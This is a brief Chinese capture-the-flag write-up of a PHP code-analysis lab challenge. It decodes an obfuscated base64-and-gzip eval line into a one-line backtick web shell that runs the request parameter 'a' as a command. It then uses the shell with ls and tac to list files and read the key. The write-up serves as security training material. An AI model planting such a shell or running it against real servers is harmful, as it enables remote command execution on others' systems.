打开发现提示key在根目录,且给出代码
<?php
eval(gzinflate(base64_decode(&40pNzshXSFCJD3INDHUNDolOjE2wtlawt+MCAA==&)));
?> 
这是base64加密+压缩的编码
简单方法就是直接把eval改成echo输出
执行<?php
echo(gzinflate(base64_decode(‘40pNzshXSFCJD3INDHUNDolOjE2wtlawt+MCAA==’)));
?> 

 

墨者学院 - PHP代码分析溯源(第4题)


得到echo `$_REQUEST[a]`;; ?>
发现有命令执行漏洞

直接给a传入 ls -al

ip/f.php?a=ls      显示所有文件

发现key,直接用cat没读出来(查看源码可看到),用tac读取得到key。

墨者学院 - PHP代码分析溯源(第4题)

 

相关文章:

  • 2022-12-23
  • 2021-10-05
  • 2021-07-12
  • 2021-10-30
  • 2021-06-25
  • 2021-11-26
  • 2021-12-10
  • 2021-11-01
猜你喜欢
  • 2021-05-19
  • 2021-09-09
  • 2021-09-08
  • 2022-01-12
  • 2021-09-22
  • 2021-09-08
  • 2021-11-23
相关资源
相似解决方案